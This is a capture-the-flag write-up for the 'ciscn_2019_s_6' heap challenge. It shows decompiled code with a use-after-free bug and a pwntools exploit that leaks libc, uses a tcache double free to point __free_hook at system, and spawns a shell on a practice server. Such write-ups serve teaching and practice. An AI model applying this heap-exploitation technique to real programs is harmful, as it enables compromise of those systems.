ciscn_2019_s_6
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
64位保护全开
unsigned __int64 add()
{
int v1; // [rsp+4h] [rbp-3Ch]
void **v2; // [rsp+8h] [rbp-38h]
size_t size[5]; // [rsp+10h] [rbp-30h] BYREF
unsigned __int64 v4; // [rsp+38h] [rbp-8h]
v4 = __readfsqword(0x28u);
if ( heap_number > 12 )
{
puts("Enough!");
exit(0);
}
v1 = heap_number;
*((_QWORD *)&heap_addr + v1) = malloc(0x18uLL);
puts("Please input the size of compary's name");
__isoc99_scanf("%d", size);
*(_DWORD *)(*((_QWORD *)&heap_addr + heap_number) + 8LL) = size[0];
v2 = (void **)*((_QWORD *)&heap_addr + heap_number);
*v2 = malloc(LODWORD(size[0]));
puts("please input name:");
read(0, **((void ***)&heap_addr + heap_number), LODWORD(size[0]));
puts("please input compary call:");
read(0, (void *)(*((_QWORD *)&heap_addr + heap_number) + 12LL), 0xCuLL);
*(_BYTE *)(*((_QWORD *)&heap_addr + heap_number) + 23LL) = 0;
puts("Done!");
++heap_number;
return __readfsqword(0x28u) ^ v4;
}
不限制size大小,
unsigned __int64 call()
{
int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]
v2 = __readfsqword(0x28u);
puts("Please input the index:");
__isoc99_scanf("%d", &v1);
if ( *((_QWORD *)&heap_addr + v1) )
free(**((void ***)&heap_addr + v1));
puts("You try it!");
puts("Done");
return __readfsqword(0x28u) ^ v2;
}
uaf。。。
unsigned __int64 show()
{
int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]
v2 = __readfsqword(0x28u);
puts("Please input the index:");
__isoc99_scanf("%d", &v1);
getchar();
if ( *((_QWORD *)&heap_addr + v1) )
{
puts("name:");
puts(**((const char ***)&heap_addr + v1));
puts("phone:");
puts((const char *)(*((_QWORD *)&heap_addr + v1) + 12LL));
}
puts("Done!");
return __readfsqword(0x28u) ^ v2;
}
show这里因为uaf也可以直接泄露libc
思路
利用uaf泄露libc,本题部署在libc-2.27,并且是可以使用tcache double free
直接改fd,
再改freehook
–>system
–>free掉/bin/sh
from pwn import*
from Yapack import *
libc=ELF('libc.so.6')
context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",27734,"./pwn",10)
add(0x420,b'aa',b'b'*0xc)#0
add(0x20,b'aa',b'bb')#1
add(0x20,b'/bin/sh\x00',b'bb')#2
dele(0)
show(0)
leak=get_addr_u64()-libc.sym['__malloc_hook']-96-0x10
li(leak)
free=freehook(leak)
sys=system(leak)
dele(1)
dele(1)
add(0x20,p64(free),b'bb')
add(0x20,b'aa',b'bb')
add(0x20,p64(sys),b'bb')
dele(2)
#debug()
ia(c)